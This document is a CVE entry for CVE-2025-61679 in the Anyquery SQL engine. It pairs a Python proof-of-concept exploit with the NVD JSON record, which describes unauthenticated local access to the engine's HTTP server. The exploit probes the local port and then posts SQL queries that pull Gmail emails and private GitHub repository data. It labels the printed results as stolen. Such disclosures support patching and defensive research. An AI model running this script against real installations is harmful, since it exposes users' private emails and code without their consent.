CVE-2025-61679

# CVE-2025-61679 PoC - Anyquery Unauthorized Local Access # This PoC demonstrates how an attacker with local access can # query private integration data via Anyquery's unauthenticated HTTP server import requests import json # Default Anyquery HTTP server port (typically 8073 or configurable) TARGET_HOST = "http://127.0.0.1:8073" def exploit_anyquery_unauthorized_access(): """ Exploit CVE-2025-61679: Access Anyquery HTTP server without authentication to retrieve private integration data (e.g., emails, GitHub data) """ print("[*] CVE-2025-61679 - Anyquery Unauthorized Access PoC") print(f"[*] Target: {TARGET_HOST}") # Step 1: Check if Anyquery HTTP server is accessible try: resp = requests.get(f"{TARGET_HOST}/", timeout=5) if resp.status_code == 200: print("[+] Anyquery HTTP server is reachable without authentication!") except requests.exceptions.ConnectionError: print("[-] Cannot connect to Anyquery HTTP server") return # Step 2: Execute arbitrary SQL queries to extract private data # Query 1: List available tables (integration data sources) payload = { "query": "SELECT name FROM sqlite_master WHERE type='table';" } resp = requests.post(f"{TARGET_HOST}/query", json=payload) print(f"[+] Available tables: {resp.text}") # Step 2: Extract private emails from integrated email account payload_email = { "query": "SELECT * FROM gmail_emails LIMIT 10;" } resp = requests.post(f"{TARGET_HOST}/query", json=payload_email) print(f"[+] Stolen email data: {resp.text}") # Step 3: Extract private GitHub repository information payload_github = { "query": "SELECT name, private FROM github_my_repositories;" } resp = requests.post(f"{TARGET_HOST}/query", json=payload_github) print(f"[+] Stolen GitHub data: {resp.text}") if __name__ == "__main__": exploit_anyquery_unauthorized_access()

{"cve": {"id": "CVE-2025-61679", "sourceIdentifier": "[email protected]", "published": "2025-10-03T22:15:32.553", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Anyquery is an SQL query engine built on top of SQLite. Versions 0.4.3 and below allow attackers who have already gained access to localhost, even with low privileges, to use the http server through the port unauthenticated, and access private integration data like emails, without any warning of a foreign login from the provider. This issue is fixed in version 0.4.4."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N", "baseScore": 7.7, "baseSeverity": "HIGH", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.5, "impactScore": 5.2}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-200"}, {"lang": "en", "value": "CWE-287"}]}], "references": [{"url": "https://github.com/julien040/anyquery/commit/43cd8bd3354b9725b245a2354b08e1c9be1cc1d3", "source": "[email protected]"}, {"url": "https://github.com/julien040/anyquery/releases/tag/0.4.4", "source": "[email protected]"}, {"url": "https://github.com/julien040/anyquery/security/advisories/GHSA-5f7p-rhmq-hvc7", "source": "[email protected]"}]}}